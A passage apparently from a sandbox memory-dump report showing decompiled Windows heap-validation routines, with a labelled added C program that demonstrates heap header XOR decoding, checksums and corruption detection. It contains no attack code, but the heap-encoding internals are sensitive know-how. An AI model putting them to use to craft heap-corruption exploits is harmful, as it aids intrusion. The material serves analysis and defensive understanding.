                    											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                    											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    										}
                    										goto L82;
                    									}
                    								}
                    							}
                    						}
                    						_t281 = _v28 + 0xfffffff0;
                    						_v24 = _t281;
                    						__eflags = _t390 & 0x00000002;
                    						if((_t390 & 0x00000002) != 0) {
                    							__eflags = _t281 - 4;
                    							if(_t281 > 4) {
                    								_t281 = _t281 - 4;
                    								__eflags = _t281;
                    								_v24 = _t281;
                    							}
                    						}
                    						__eflags = _t390 & 0x00000008;
                    						if((_t390 & 0x00000008) == 0) {
                    							_t102 = _t415 + 0x10; // -8
                    							_t283 = E0102D540(_t102, _t281, 0xfeeefeee);
                    							_v20 = _t283;
                    							__eflags = _t283 - _v24;
                    							if(_t283 != _v24) {
                    								_t284 =  *[fs:0x30];
                    								__eflags =  *(_t284 + 0xc);
                    								if( *(_t284 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_t288 = _v20 + 8 + _t415;
                    								__eflags = _t288;
                    								_push(_t288);
                    								_push(_t415);
                    								_push("Free Heap block %p modified at %p after it was freed\n");
                    								goto L95;
                    							}
                    							goto L66;
                    						} else {
                    							_t374 =  *(_t415 + 8);
                    							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                    							_v24 = _t374;
                    							_v28 = _t400;
                    							_t294 =  *(_t374 + 4);
                    							__eflags =  *_t400 - _t294;
                    							if( *_t400 != _t294) {
                    								L64:
                    								_push(_t374);
                    								_push( *_t400);
                    								_t101 = _t415 + 8; // -16
                    								E0109A80D(_t414, 0xd, _t101, _t294);
                    								goto L86;
                    							}
                    							_t56 = _t415 + 8; // -16
                    							__eflags =  *_t400 - _t56;
                    							_t374 = _v24;
                    							if( *_t400 != _t56) {
                    								goto L64;
                    							}
                    							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                    							_t402 =  *(_t414 + 0xb4);
                    							__eflags = _t402;
                    							if(_t402 == 0) {
                    								L35:
                    								_t298 = _v28;
                    								 *_t298 = _t374;
                    								 *(_t374 + 4) = _t298;
                    								__eflags =  *(_t415 + 2) & 0x00000008;
                    								if(( *(_t415 + 2) & 0x00000008) == 0) {
                    									L39:
                    									_t377 =  *_t415 & 0x0000ffff;
                    									_t299 = _t414 + 0xc0;
                    									_v28 =  *_t415 & 0x0000ffff;
                    									 *(_t415 + 2) = 0;
                    									 *((char*)(_t415 + 7)) = 0;
                    									__eflags =  *(_t414 + 0xb4);
                    									if( *(_t414 + 0xb4) == 0) {
                    										_t378 =  *_t299;
                    									} else {
                    										_t378 = E00FFE12C(_t414, _t377);
                    										_t299 = _t414 + 0xc0;
                    									}
                    									__eflags = _t299 - _t378;
                    									if(_t299 == _t378) {
                    										L51:
                    										_t300 =  *((intOrPtr*)(_t378 + 4));
                    										__eflags =  *_t300 - _t378;
                    										if( *_t300 != _t378) {
                    											_push(_t378);
                    											_push( *_t300);
                    											__eflags = 0;
                    											E0109A80D(0, 0xd, _t378, 0);
                    										} else {
                    											_t87 = _t415 + 8; // -16
                    											_t406 = _t87;
                    											 *_t406 = _t378;
                    											 *((intOrPtr*)(_t406 + 4)) = _t300;
                    											 *_t300 = _t406;
                    											 *((intOrPtr*)(_t378 + 4)) = _t406;
                    										}
                    										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                    										_t405 =  *(_t414 + 0xb4);
                    										__eflags = _t405;
                    										if(_t405 == 0) {
                    											L61:
                    											__eflags =  *(_t414 + 0x4c);
                    											if(__eflags != 0) {
                    												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    											}
                    											goto L86;
                    										} else {
                    											_t380 =  *_t415 & 0x0000ffff;
                    											while(1) {
                    												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                    												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                    													break;
                    												}
                    												_t307 =  *_t405;
                    												__eflags = _t307;
                    												if(_t307 == 0) {
                    													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                    													L60:
                    													_t94 = _t415 + 8; // -16
                    													E00FFE4A0(_t414, _t405, 1, _t94, _t309, _t380);
                    													goto L61;
                    												}
                    												_t405 = _t307;
                    											}
                    											_t309 = _t380;
                    											goto L60;
                    										}
                    									} else {
                    										_t407 =  *(_t414 + 0x4c);
                    										while(1) {
                    											__eflags = _t407;
                    											if(_t407 == 0) {
                    												_t312 =  *(_t378 - 8) & 0x0000ffff;
                    											} else {
                    												_t315 =  *(_t378 - 8);
                    												_t407 =  *(_t414 + 0x4c);
                    												__eflags = _t315 & _t407;
                    												if((_t315 & _t407) != 0) {
                    													_t315 = _t315 ^  *(_t414 + 0x50);
                    													__eflags = _t315;
                    												}
                    												_t312 = _t315 & 0x0000ffff;
                    											}
                    											__eflags = _v28 - (_t312 & 0x0000ffff);
                    											if(_v28 <= (_t312 & 0x0000ffff)) {
                    												goto L51;
                    											}
                    											_t378 =  *_t378;
                    											__eflags = _t414 + 0xc0 - _t378;
                    											if(_t414 + 0xc0 != _t378) {
                    												continue;
                    											}
                    											goto L51;
                    										}
                    										goto L51;
                    									}
                    								}
                    								_t317 = E00FFA229(_t414, _t415);
                    								__eflags = _t317;
                    								if(_t317 != 0) {
                    									goto L39;
                    								}
                    								E00FFA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                    								goto L86;
                    							}
                    							_t385 =  *_t415 & 0x0000ffff;
                    							while(1) {
                    								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                    								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                    									break;
                    								}
                    								_t320 =  *_t402;
                    								__eflags = _t320;
                    								if(_t320 == 0) {
                    									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                    									L34:
                    									_t63 = _t415 + 8; // -16
                    									E00FFBC04(_t414, _t402, 1, _t63, _t322, _t385);
                    									_t374 = _v24;
                    									goto L35;
                    								}
                    								_t402 = _t320;
                    							}
                    							_t322 = _t385;
                    							goto L34;
                    						}
                    					}
                    					if(_a20 == 0) {
                    						L18:
                    						if(( *(_t415 + 2) & 0x00000004) == 0) {
                    							goto L67;
                    						}
                    						if(E010823E3(_t414, _t415) == 0) {
                    							goto L117;
                    						}
                    						goto L67;
                    					} else {
                    						if((_t390 & 0x00000002) == 0) {
                    							_t326 =  *(_t415 + 3) & 0x000000ff;
                    						} else {
                    							_t328 = E00FD1F5B(_t415);
                    							_t342 = _v20;
                    							_t326 =  *(_t328 + 2) & 0x0000ffff;
                    						}
                    						_t429 = _t326;
                    						if(_t429 == 0) {
                    							goto L18;
                    						}
                    						if(_t429 >= 0) {
                    							__eflags = _t326 & 0x00000800;
                    							if(__eflags != 0) {
                    								goto L18;
                    							}
                    							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                    							if(__eflags >= 0) {
                    								goto L18;
                    							}
                    							_t412 = _a20;
                    							_t327 = _t326 & 0x0000ffff;
                    							L17:
                    							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                    							goto L18;
                    						}
                    						_t327 = _t326 & 0x00007fff;
                    						if(_t327 >= 0x81) {
                    							goto L18;
                    						}
                    						_t412 = _a24;
                    						goto L17;
                    					}
                    					L86:
                    				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                    				_t189 = _v12;
                    				goto L88;
                    			}
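The loop above decodes each 8-byte heap entry header with the heap's XOR key (heap+0x50 when heap+0x4c is non-zero), requires the fourth header byte to equal the XOR of the first three, and walks the segment in Size*8-byte steps while checking that every PreviousSize matches the preceding block's Size. The C program below is an added example, not code from the report or from ntdll: it re-implements that decode, checksum and walk over a constructed 96-byte segment and shows how a one-bit corruption of a neighbouring header is caught. The heap_entry/heap_keys names, the key values and the block sizes are assumptions made for the demo; the SegmentOffset/UnusedBytes fields, the free-list consistency and the 0xfeeefeee fill check of the listing are left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit NT heap entry header as the listing reads it: +0 Size (8-byte units),
   +2 Flags, +3 SmallTagIndex (checksum), +4 PreviousSize. */
typedef struct {
    uint16_t size, previous_size;
    uint8_t  flags, small_tag_index;
} heap_entry;

/* heap+0x4c / +0x50 / +0x54 in the listing; the key values used below are constructed. */
typedef struct {
    uint32_t encode_flag_mask; /* 0 = headers in clear, checksum not checked */
    uint32_t encoding0;        /* XORed with the first header dword */
    uint32_t encoding1;        /* low 16 bits XORed with PreviousSize */
} heap_keys;

/* Decode as the loop does; 1 = SmallTagIndex matches byte0^byte1^byte2 (or encoding off). */
static int decode_header(const uint8_t raw[8], const heap_keys *k, heap_entry *e)
{
    uint32_t first, second;
    memcpy(&first, raw, 4);
    memcpy(&second, raw + 4, 4);
    if (k->encode_flag_mask) {
        first  ^= k->encoding0;
        second ^= k->encoding1 & 0xffffu;
    }
    e->size            = (uint16_t)first;
    e->flags           = (uint8_t)(first >> 16);
    e->small_tag_index = (uint8_t)(first >> 24);
    e->previous_size   = (uint16_t)second;
    return !k->encode_flag_mask ||
           (uint8_t)(first ^ (first >> 8) ^ (first >> 16)) == e->small_tag_index;
}

/* Inverse of decode_header, used to build the constructed segment. */
static void encode_header(const heap_entry *e, const heap_keys *k, uint8_t raw[8])
{
    uint8_t  chk    = (uint8_t)(e->size ^ (e->size >> 8) ^ e->flags);
    uint32_t first  = e->size | ((uint32_t)e->flags << 16) | ((uint32_t)chk << 24);
    uint32_t second = e->previous_size;
    if (k->encode_flag_mask) {
        first  ^= k->encoding0;
        second ^= k->encoding1 & 0xffffu;
    }
    memcpy(raw, &first, 4);
    memcpy(raw + 4, &second, 4);
}

/* Walk like the decompiled do/while: step Size*8 bytes, require PreviousSize ==
   previous Size and a valid checksum. Returns block count, or -1 (corrupted
   header), -2 (incorrect PreviousSize field), -3 (runs past the segment end). */
static int validate_segment(const uint8_t *base, size_t len, const heap_keys *k)
{
    size_t off = 0; uint16_t prev = 0; int n = 0;
    for (; off + 8 <= len; n++) {
        heap_entry e;
        if (!decode_header(base + off, k, &e))              return -1;
        if (e.previous_size != prev)                        return -2;
        if (e.size == 0 || off + (size_t)e.size * 8 > len) return -3;
        prev = e.size;
        off += (size_t)e.size * 8;
    }
    return off == len ? n : -3;
}

/* Constructed segment: three busy blocks of 4, 2 and 6 units (96 bytes). */
static size_t build_segment(uint8_t *buf, const heap_keys *k)
{
    static const uint16_t sizes[3] = {4, 2, 6};
    size_t off = 0; uint16_t prev = 0;
    for (int i = 0; i < 3; i++) {
        heap_entry e = { sizes[i], prev, 0x01, 0 };
        encode_header(&e, k, buf + off);
        memset(buf + off + 8, 0, (size_t)sizes[i] * 8 - 8);
        prev = sizes[i];
        off += (size_t)sizes[i] * 8;
    }
    return off;
}

/* Validate the intact segment (3 blocks), flip one bit of block 2's Size byte as an
   overflow out of block 1 would, and return the verdict: -1 if encoded, else -3. */
static int demo_tamper(int encoded)
{
    heap_keys k = { encoded ? 1u : 0u, 0xA5C3E1F7u, 0x00003D2Bu };
    uint8_t seg[96];
    size_t len = build_segment(seg, &k);
    if (validate_segment(seg, len, &k) != 3)
        return 99; /* the constructed segment must validate before tampering */
    seg[4 * 8] ^= 0x10;
    return validate_segment(seg, len, &k);
}

int main(void)
{
    return printf("verdicts: encoded %d, clear %d\n", demo_tamper(1), demo_tamper(0)) < 0;
}
```

With encoding on, the corruption is caught by the checksum before any size is trusted, which is why the listing verifies byte 3 immediately after the XOR; with encoding off the same corruption is only noticed later, when the inflated Size carries the walk past the segment end.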

                    0x01094af7
                    0x01094afb
                    0x01094afd
                    0x01094b01
                    0x01094b03
                    0x01094b08
                    0x01094b0a
                    0x01094b0f
                    0x01094eb5
                    0x01094eb5
                    0x01094ebb
                    0x010950d5
                    0x010950d8
                    0x01094ff6
                    0x00000000
                    0x01094ff6
                    0x010950de
                    0x010950e4
                    0x010950e8
                    0x01095107
                    0x0109510c
                    0x010950ea
                    0x010950ff
                    0x01095104
                    0x01095112
                    0x01095115
                    0x01095118
                    0x01095119
                    0x010950cb
                    0x010950cb
                    0x010950af
                    0x00000000
                    0x010950af
                    0x01094ecb
                    0x010950b6
                    0x010950bb
                    0x01094ed1
                    0x01094ee6
                    0x01094eeb
                    0x010950c1
                    0x010950c2
                    0x010950c5
                    0x010950c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01094b15
                    0x01094b15
                    0x01094b1c
                    0x01094b1e
                    0x01094b23
                    0x01094b27
                    0x01094b33
                    0x01094b38
                    0x01094b3a
                    0x01094b3c
                    0x01094b41
                    0x01094b41
                    0x01094b3a
                    0x01094b52
                    0x01095045
                    0x0109504b
                    0x0109504f
                    0x0109506e
                    0x01095073
                    0x01095051
                    0x01095066
                    0x0109506b
                    0x01095083
                    0x01095088
                    0x01095088
                    0x0109508a
                    0x01095091
                    0x01095099
                    0x01095099
                    0x0109509d
                    0x010950a7
                    0x010950ad
                    0x010950ad
                    0x010950ad
                    0x00000000
                    0x0109509d
                    0x01094b58
                    0x01094b5b
                    0x01094b5e
                    0x01094b63
                    0x01094b66
                    0x01094b69
                    0x01094b6f
                    0x01094be4
                    0x01094bf0
                    0x01094bf2
                    0x01094bf5
                    0x01094dc3
                    0x01094dc6
                    0x01094dc9
                    0x01094dce
                    0x01094dce
                    0x01094dd0
                    0x01094dd0
                    0x01094dd5
                    0x01094def
                    0x01094dd7
                    0x01094de7
                    0x01094de7
                    0x01094df3
                    0x01095001
                    0x01095007
                    0x0109500b
                    0x0109502a
                    0x0109502f
                    0x0109500d
                    0x01095022
                    0x01095027
                    0x01095039
                    0x0109503a
                    0x0109503b
                    0x00000000
                    0x01094df9
                    0x01094dfd
                    0x01094e90
                    0x01094e94
                    0x01094e9e
                    0x01094ea4
                    0x01094ea4
                    0x01094ea4
                    0x01094ea6
                    0x01094ea6
                    0x00000000
                    0x01094ea6
                    0x01094e03
                    0x01094e08
                    0x01094f88
                    0x01094f92
                    0x01094f99
                    0x01094f9c
                    0x01094fe0
                    0x01094fe4
                    0x01094fee
                    0x01094ff4
                    0x01094ff4
                    0x01094ff4
                    0x00000000
                    0x01094fe4
                    0x01094f9e
                    0x01094fa4
                    0x01094fa8
                    0x01094fc7
                    0x01094fcc
                    0x01094faa
                    0x01094fbf
                    0x01094fc4
                    0x01094fd2
                    0x01094fd5
                    0x01094fd6
                    0x01094f34
                    0x01094f34
                    0x00000000
                    0x01094f39
                    0x01094e0e
                    0x01094e14
                    0x01094e1b
                    0x01094e25
                    0x01094e2b
                    0x01094e2b
                    0x01094e33
                    0x01094e38
                    0x01094e8a
                    0x01094e8a
                    0x00000000
                    0x01094e3a
                    0x01094e3e
                    0x01094e43
                    0x01094e47
                    0x01094e53
                    0x01094e58
                    0x01094e5a
                    0x01094e5c
                    0x01094e61
                    0x01094e61
                    0x01094e5a
                    0x01094e6e
                    0x01094f41
                    0x01094f47
                    0x01094f4b
                    0x01094f6a
                    0x01094f6f
                    0x01094f4d
                    0x01094f62
                    0x01094f67
                    0x01094f7f
                    0x01094f80
                    0x01094f81
                    0x00000000
                    0x01094e74
                    0x01094e78
                    0x01094e82
                    0x01094e88
                    0x01094e88
                    0x00000000
                    0x01094e78
                    0x01094e6e
                    0x01094e38
                    0x01094df3
                    0x01094bfe
                    0x01094c01
                    0x01094c04

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                    • API String ID: 0-3591852110
                    • Opcode ID: 438f2cc693b8099f9bbfbeaf05d6c20c5356584dda696015c0b42597bdba5276
                    • Instruction ID: bd8fdb18e6728d34e14c9201d3b9772e2ef20a60fafed13b754a460f75ae74b9
                    • Opcode Fuzzy Hash: 438f2cc693b8099f9bbfbeaf05d6c20c5356584dda696015c0b42597bdba5276
                    • Instruction Fuzzy Hash: A012C170204646DFDB25DF29C5A5BBABBF1EF44300F148499E4C6CB682D738E882EB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 56%
                    			E01094496(signed int* __ecx, void* __edx) {
                    				signed int _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed char _v24;
                    				signed int* _v28;
                    				char _v32;
                    				signed int* _v36;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t150;
                    				intOrPtr _t151;
                    				signed char _t156;
                    				intOrPtr _t157;
                    				unsigned int _t169;
                    				intOrPtr _t170;
                    				signed int* _t183;
                    				signed char _t184;
                    				intOrPtr _t191;
                    				signed int _t201;
                    				intOrPtr _t203;
                    				intOrPtr _t212;
                    				intOrPtr _t220;
                    				signed int _t230;
                    				signed int _t241;
                    				signed int _t244;
                    				void* _t259;
                    				signed int _t260;
                    				signed int* _t261;
                    				intOrPtr* _t262;
                    				signed int _t263;
                    				signed int* _t264;
                    				signed int _t267;
                    				signed int* _t268;
                    				void* _t270;
                    				void* _t281;
                    				signed short _t285;
                    				signed short _t289;
                    				signed int _t291;
                    				signed int _t298;
                    				signed char _t303;
                    				signed char _t308;
                    				signed int _t314;
                    				intOrPtr _t317;
                    				unsigned int _t319;
                    				signed int* _t325;
                    				signed int _t326;
                    				signed int _t327;
                    				intOrPtr _t328;
                    				signed int _t329;
                    				signed int _t330;
                    				signed int* _t331;
                    				signed int _t332;
                    				signed int _t350;
                    
                    				_t259 = __edx;
                    				_t331 = __ecx;
                    				_v28 = __ecx;
                    				_v20 = 0;
                    				_v12 = 0;
                    				_t150 = E010949A4(__ecx);
                    				_t267 = 1;
                    				if(_t150 == 0) {
                    					L61:
                    					_t151 =  *[fs:0x30];
                    					__eflags =  *((char*)(_t151 + 2));
                    					if( *((char*)(_t151 + 2)) != 0) {
                    						 *0x10c6378 = _t267;
                    						asm("int3");
                    						 *0x10c6378 = 0;
                    					}
                    					__eflags = _v12;
                    					if(_v12 != 0) {
                    						_t105 =  &_v16;
                    						 *_t105 = _v16 & 0x00000000;
                    						__eflags =  *_t105;
                    						E0100174B( &_v12,  &_v16, 0x8000);
                    					}
                    					L65:
                    					__eflags = 0;
                    					return 0;
                    				}
                    				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                    					_t268 =  &(_t331[0x30]);
                    					_v32 = 0;
                    					_t260 =  *_t268;
                    					_t308 = 0;
                    					_v24 = 0;
                    					while(_t268 != _t260) {
                    						_t260 =  *_t260;
                    						_v16 =  *_t325 & 0x0000ffff;
                    						_t156 = _t325[0];
                    						_v28 = _t325;
                    						_v5 = _t156;
                    						__eflags = _t156 & 0x00000001;
                    						if((_t156 & 0x00000001) != 0) {
                    							_t157 =  *[fs:0x30];
                    							__eflags =  *(_t157 + 0xc);
                    							if( *(_t157 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E00FDB150();
                    							} else {
                    								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push(_t325);
                    							E00FDB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                    							L32:
                    							_t270 = 0;
                    							__eflags = _t331[0x13];
                    							if(_t331[0x13] != 0) {
                    								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                    								 *_t325 =  *_t325 ^ _t331[0x14];
                    							}
                    							L60:
                    							_t267 = _t270 + 1;
                    							__eflags = _t267;
                    							goto L61;
                    						}
                    						_t169 =  *_t325 & 0x0000ffff;
                    						__eflags = _t169 - _t308;
                    						if(_t169 < _t308) {
                    							_t170 =  *[fs:0x30];
                    							__eflags =  *(_t170 + 0xc);
                    							if( *(_t170 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E00FDB150();
                    							} else {
                    								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							E00FDB150("Non-Dedicated free list element %p is out of order\n", _t325);
                    							goto L32;
                    						} else {
                    							__eflags = _t331[0x13];
                    							_t308 = _t169;
                    							_v24 = _t308;
                    							if(_t331[0x13] != 0) {
                    								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                    								 *_t325 =  *_t325 ^ _t331[0x14];
                    								__eflags =  *_t325;
                    							}
                    							_t26 =  &_v32;
                    							 *_t26 = _v32 + 1;
                    							__eflags =  *_t26;
                    							continue;
                    						}
                    					}
                    					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                    					if( *0x10c6350 != 0 && _t331[0x2f] != 0) {
                    						_push(4);
                    						_push(0x1000);
                    						_push( &_v16);
                    						_push(0);
                    						_push( &_v12);
                    						_push(0xffffffff);
                    						if(E01019660() >= 0) {
                    							_v20 = _v12 + 0x204;
                    						}
                    					}
                    					_t183 =  &(_t331[0x27]);
                    					_t281 = 0x81;
                    					_t326 =  *_t183;
                    					if(_t183 == _t326) {
                    						L49:
                    						_t261 =  &(_t331[0x29]);
                    						_t184 = 0;
                    						_t327 =  *_t261;
                    						_t282 = 0;
                    						_v24 = 0;
                    						_v36 = 0;
                    						__eflags = _t327 - _t261;
                    						if(_t327 == _t261) {
                    							L53:
                    							_t328 = _v32;
                    							_v28 = _t331;
                    							__eflags = _t328 - _t184;
                    							if(_t328 == _t184) {
                    								__eflags = _t331[0x1d] - _t282;
                    								if(_t331[0x1d] == _t282) {
                    									__eflags = _v12;
                    									if(_v12 == 0) {
                    										L82:
                    										_t267 = 1;
                    										__eflags = 1;
                    										goto L83;
                    									}
                    									_t329 = _t331[0x2f];
                    									__eflags = _t329;
                    									if(_t329 == 0) {
                    										L77:
                    										_t330 = _t331[0x22];
                    										__eflags = _t330;
                    										if(_t330 == 0) {
                    											L81:
                    											_t129 =  &_v16;
                    											 *_t129 = _v16 & 0x00000000;
                    											__eflags =  *_t129;
                    											E0100174B( &_v12,  &_v16, 0x8000);
                    											goto L82;
                    										}
                    										_t314 = _t331[0x21] & 0x0000ffff;
                    										_t285 = 1;
                    										__eflags = 1 - _t314;
                    										if(1 >= _t314) {
                    											goto L81;
                    										} else {
                    											goto L79;
                    										}
                    										while(1) {
                    											L79:
                    											_t330 = _t330 + 0x40;
                    											_t332 = _t285 & 0x0000ffff;
                    											_t262 = _v20 + _t332 * 4;
                    											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                    											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                    												break;
                    											}
                    											_t285 = _t285 + 1;
                    											__eflags = _t285 - _t314;
                    											if(_t285 < _t314) {
                    												continue;
                    											}
                    											goto L81;
                    										}
                    										_t191 =  *[fs:0x30];
                    										__eflags =  *(_t191 + 0xc);
                    										if( *(_t191 + 0xc) == 0) {
                    											_push("HEAP: ");
                    											E00FDB150();
                    										} else {
                    											E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    										}
                    										_push(_t262);
                    										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                    										_t148 = _t330 + 0x10; // 0x10
                    										_push( *((intOrPtr*)(_t330 + 8)));
                    										E00FDB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                    										L59:
                    										_t270 = 0;
                    										__eflags = 0;
                    										goto L60;
                    									}
                    									_t289 = 1;
                    									__eflags = 1;
                    									while(1) {
                    										_t201 = _v12;
                    										_t329 = _t329 + 0xc;
                    										_t263 = _t289 & 0x0000ffff;
                    										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                    										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                    											break;
                    										}
                    										_t289 = _t289 + 1;
                    										__eflags = _t289 - 0x81;
                    										if(_t289 < 0x81) {
                    											continue;
                    										}
                    										goto L77;
                    									}
                    									_t203 =  *[fs:0x30];
                    									__eflags =  *(_t203 + 0xc);
                    									if( *(_t203 + 0xc) == 0) {
                    										_push("HEAP: ");
                    										E00FDB150();
                    									} else {
                    										E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    									}
                    									_t291 = _v12;
                    									_push(_t291 + _t263 * 4);
                    									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                    									_push( *((intOrPtr*)(_t329 + 8)));
                    									E00FDB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                    									goto L59;
                    								}
                    								_t212 =  *[fs:0x30];
                    								__eflags =  *(_t212 + 0xc);
                    								if( *(_t212 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push(_t331[0x1d]);
                    								_push(_v36);
                    								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                    								L58:
                    								E00FDB150();
                    								goto L59;
                    							}
                    							_t220 =  *[fs:0x30];
                    							__eflags =  *(_t220 + 0xc);
                    							if( *(_t220 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E00FDB150();
                    							} else {
                    								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push(_t328);
                    							_push(_v24);
                    							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                    							goto L58;
                    						} else {
                    							goto L50;
                    						}
                    						while(1) {
                    							L50:
                    							_t92 = _t327 - 0x10; // -24
                    							_t282 = _t331;
                    							_t230 = E01094AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                    							__eflags = _t230;
                    							if(_t230 == 0) {
                    								goto L59;
                    							}
                    							_t327 =  *_t327;
                    							__eflags = _t327 - _t261;
                    							if(_t327 != _t261) {
                    								continue;
                    							}
                    							_t184 = _v24;
                    							_t282 = _v36;
                    							goto L53;
                    						}
                    						goto L59;
                    					} else {
                    						while(1) {
                    							_t39 = _t326 + 0x18; // 0x10
                    							_t264 = _t39;
                    							if(_t331[0x13] != 0) {
                    								_t319 = _t331[0x14] ^  *_t264;
                    								 *_t264 = _t319;
                    								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                    								_t348 = _t319 >> 0x18 - _t303;
                    								if(_t319 >> 0x18 != _t303) {
                    									_push(_t303);
                    									E0108FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                    								}
                    								_t281 = 0x81;
                    							}
                    							_t317 = _v20;
                    							if(_t317 != 0) {
                    								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                    								_t350 = _t241;
                    								if(_t350 != 0) {
                    									if(_t350 >= 0) {
                    										__eflags = _t241 & 0x00000800;
                    										if(__eflags == 0) {
                    											__eflags = _t241 - _t331[0x21];
                    											if(__eflags < 0) {
                    												_t298 = _t241;
                    												_t65 = _t317 + _t298 * 4;
                    												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                    												__eflags =  *_t65;
                    											}
                    										}
                    									} else {
                    										_t244 = _t241 & 0x00007fff;
                    										if(_t244 < _t281) {
                    											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                    										}
                    									}
                    								}
                    							}
                    							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010823E3(_t331, _t264) == 0) {
                    								break;
                    							}
                    							if(_t331[0x13] != 0) {
                    								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                    								 *_t264 =  *_t264 ^ _t331[0x14];
                    							}
                    							_t326 =  *_t326;
                    							if( &(_t331[0x27]) == _t326) {
                    								goto L49;
                    							} else {
                    								_t281 = 0x81;
                    								continue;
                    							}
                    						}
                    						__eflags = _t331[0x13];
                    						if(_t331[0x13] != 0) {
                    							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                    							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                    						}
                    						goto L65;
                    					}
                    				} else {
                    					L83:
                    					return _t267;
                    				}
                    			}
                    0x010946f6
                    0x010946f6
                    0x010946f6
                    0x010946ec
                    0x01094615
                    0x01094615
                    0x0109461d
                    0x0109462e
                    0x0109462e
                    0x0109461d
                    0x0109460f
                    0x01094609
                    0x010946fd
                    0x00000000
                    0x00000000
                    0x01094710
                    0x0109471a
                    0x01094720
                    0x01094720
                    0x01094722
                    0x0109472c
                    0x00000000
                    0x0109472e
                    0x0109472e
                    0x00000000
                    0x0109472e
                    0x0109472c
                    0x01094738
